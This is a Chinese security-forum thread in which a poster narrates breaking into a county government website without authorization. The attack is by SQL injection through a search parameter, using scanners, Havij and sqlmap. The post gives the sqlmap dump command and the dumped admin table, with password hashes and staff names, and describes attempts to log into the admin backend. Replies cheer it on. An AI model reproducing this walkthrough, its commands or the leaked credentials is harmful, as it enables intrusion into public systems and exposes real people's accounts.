最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 32014|回复: 367

[教程] 发一个sqlmap渗透政府站点过程,BT5R3真心好用啊

   [复制链接]
濡腾
太史寒凝
闲着无聊  偶然间进了某个县政府的网站,既然来都来了,那就给他们做一套渗透检测吧。

目标站点    http://www.xxxx.gov.cn

注意:由于一些原因,网站URL、以及数据库里的缩写名,都上了马赛克

二话不说先把这个站点扔进SAFE3WVS里面扫        如果有eweb编辑器    上传点啥的  可以直接利用下

结果看了半天也没个能用的,倒是有个sql注射点。

收拾收拾~~   开工了

注射点为   http://www.xxxx.gov.cn/m/search/list.php?siteId=2
加'出现错误    可以看到这个注入点是存在的    而且是MySQL的       如果MySQL版本高于5.0    可以直接去爆出表和字段。。
如下图
psb.png


懒得手工,直接扔进havij里面跑   等了好久,,没跑出来~~

开启SQL注射大杀器     sqlmap
先列数据库    如下图:
psb.png


psb.png
  • client\\_fxjwxmgk
  • XXXXXold
  • fxrd
  • fxxq
  • test
  • test\\_%
  • ymsxd

    从上面的图里可以看到有七个数据库,xxxxxold   这个数据库应该是比较古老的数据库      因为最后管理员加上了old(古老的) ;果断将这个库暂时放弃掉。
    还剩下六个,一个个的来吧。

    client\\_fxjwxmgk             先来这一个,果断先列表。命令如下图:

    psb.png

    可以看到这个网站的环境是Apache+MySQL4.0+php4.3.9
    可惜了,不能直接爆,需要慢慢猜解表和字段。
    如下图:
    psb.png

    经过很长时间,一个个的测试完了,除了xxxxold以及fxxq其他的都是空数据库
    fxxq的表有以下三个

    Database: fxxq
    [3 tables]
    +---------+
    | article |
    | counter |
    | webuser |
    +---------+

    psb.png


    猜测管理员所在的表是    webuser

    来列webuser这个表的字段看看
    psb.png

    tual further processing
    [13:52:10] [INFO] postprocessing table dump
    Database: fxxq
    Table: webuser
    [4 entries]
    +----+---------+-------------------------------------------+---------+-----------+------------+
    | id | ip      | pwd                                       | email   | user_name | department |
    +----+---------+-------------------------------------------+---------+-----------+------------+
    | 1  | <blank> | afee51453860d0e63d677e0a78df3c56          | <blank> | 管理员    | <blank>    |
    | 2  | <blank> | 664e21ddbd832bd566a64d65d26e8e76          | <blank> | 管理员    | <blank>    |
    | 3  | <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | 李宏      | <blank>    |
    | 4  | <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | 孙晋儒    | <blank>    |
    +----+---------+-------------------------------------------+---------+-----------+------------+
    管理员的密码就这么出来了。。

    psb.png

    uid1的管理员密码暂时没能解密出来   
    uid2的管理员密码是
    解密后是*@Tvbs
    后台管理登陆地址是   http://www.xxxxx.gov.cn/webadmin/index.php
    蛋碎了,一直登陆不上..绞尽脑汁的想啊想。。

    突然发现肿么木有管理员的账号呢?
    由于MySQL版本是4.0的 不能直接列表和字段,sqlmap可能没有能猜解出来
    好吧,去后台登陆看一下网页源码

    <TD width="[url=]38%[/url]" height=[url=]18[/url] align="[url=]right[/url]"><SPAN                              class=[url=]style16[/url]><FONT color=[url=]#000000[/url]>帐 号:                              </FONT></SPAN></TD>                            <TD width="[url=]62%[/url]"><FONT color=[url=]#ffffff[/url]><INPUT class=[url=]from[/url] style="[url=]BORDER-RIGHT: #ffffff 1px groove; BORDER-TOP: #ffffff 1px groove; FONT: 12px Verdana,Geneva,sans-serif; BORDER-LEFT: #ffffff 1px groove; BORDER-BOTTOM: #ffffff 1px groove; BACKGROUND-COLOR: #dff1f9[/url]" value="" id="[url=]user_code[/url]" name="[url=]user_code[/url]" size="[url=]16[/url]"> </FONT></TD></TR>                          <TR>                            <TD align="[url=]right[/url]"><SPAN class=[url=]style16[/url]><FONT                              color=[url=]#000000[/url]>密 码: </FONT></SPAN></TD>                            <TD height=[url=]18[/url]><FONT color=[url=]#ffffff[/url]><INPUT                              style="[url=]BORDER-RIGHT: #ffffff 1px groove; BORDER-TOP: #ffffff 1px groove; FONT: 12px Verdana,Geneva,sans-serif; BORDER-LEFT: #ffffff 1px groove; BORDER-BOTTOM: #ffffff 1px groove; BACKGROUND-COLOR: #dff1f9[/url]"                              type="[url=]password[/url]" name="[url=]pwd[/url]" value="" size="[url=]16[/url]"> </FONT></TD></TR>

    分析整理了下前前后后的资料

    数据库有下面这7个
  • client\\_fxjwxmgk
  • XXXXXold
  • fxrd
  • fxxq
  • test
  • test\\_%
  • ymsxd

  • 唯独XXXXXold和
    fxxq这两个数据库不是空的,其他都是空数据库  带old的那个应该是备份的

    fxxq的表有下面这几个

    Database: fxxq
    [3 tables]
    +---------+
    | article |
    | counter |
    | webuser |
    +---------+

    webuser的表内字段以及内容有下面这些

    Database: fxxq
    Table: webuser
    [4 entries]
    +----+---------+-------------------------------------------+---------+-----------+------------+
    | id | ip      | pwd                                       | email   | user_name | department |
    +----+---------+-------------------------------------------+---------+-----------+------------+
    | 1  | <blank> | afee51453860d0e63d677e0a78df3c56          | <blank> | 管理员    | <blank>    |
    | 2  | <blank> | 664e21ddbd832bd566a64d65d26e8e76          | <blank> | 管理员    | <blank>    |
    | 3  | <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | 李宏      | <blank>    |
    | 4  | <blank> | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | 孙晋儒    | <blank>    |
    +----+---------+-------------------------------------------+---------+-----------+------------+

    这些资料结合上面的网页源代码一起分析,会发现猜解的字段里没有user_code这个字段。  
    好吧,我们开始列user_code字段的内容。
    构造出了下面的命令
    python ./sqlmap.py -u http://www.xxxx.gov.cn/m/search/list.php?siteId=2 --dump -C "user_code" -T "webuser" -D "fxxq" -v 0

    效果:
    psb.png

    很好,管理员的账号密码都出来了,再去登陆看看
    还是失败。于是又搞了下xxxxold的数据库

    psb.png

    发现各种局,各种办的账号密码都泄露了。。。
    密码解不开的解不开      能解开的都登陆不上,应该是被限制登录IP了吧。
    可以执行CMD命令以及sql查询命令
    差不多就好了,收手~~~

    此次渗透以失败告终,漏洞细节已报给当地政府
    最后送个礼包,回复可见哈:
    游客,如果您要查看本帖隐藏内容请回复

    评分

    参与人数 2 威望 +6 骨头 +8 收起 理由
    admin + 6 支持分享!
    华崽 + 8 支持原创!

    查看全部评分

    +1
    32385°C
    367
    • chenbowen
    • hawkeye
    • 彡_-
    • √白_
    • wifihacker
    过: 他们
    胤琛
    嘉勇
    看一看是什么礼包啊?

    评分

    参与人数 1 骨头 +2 收起 理由
    寂丶夏殇° + 2

    查看全部评分

    敛骊雪
    麦光济
    支持赞一个

    评分

    参与人数 1 骨头 +2 收起 理由
    寂丶夏殇° + 2

    查看全部评分

    骞然
    源烨赫

    支持赞一个

    评分

    参与人数 1 骨头 +2 收起 理由
    寂丶夏殇° + 2

    查看全部评分

    嘉依
    嵇古韵
    发一个sqlmap渗透政府站点过程,BT5R3真心好用啊
    鲍永长
    仁弘懿
    怎么死的都不知道···
    弥问凝
    山开畅
    看起来狠牛啊,可惜我看不懂,难道楼主就是传说中的黑客在攻击那个网站吗?
    甲靖巧
    祁壹
    看看是什么礼物。
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
    快速回复 返回顶部 返回列表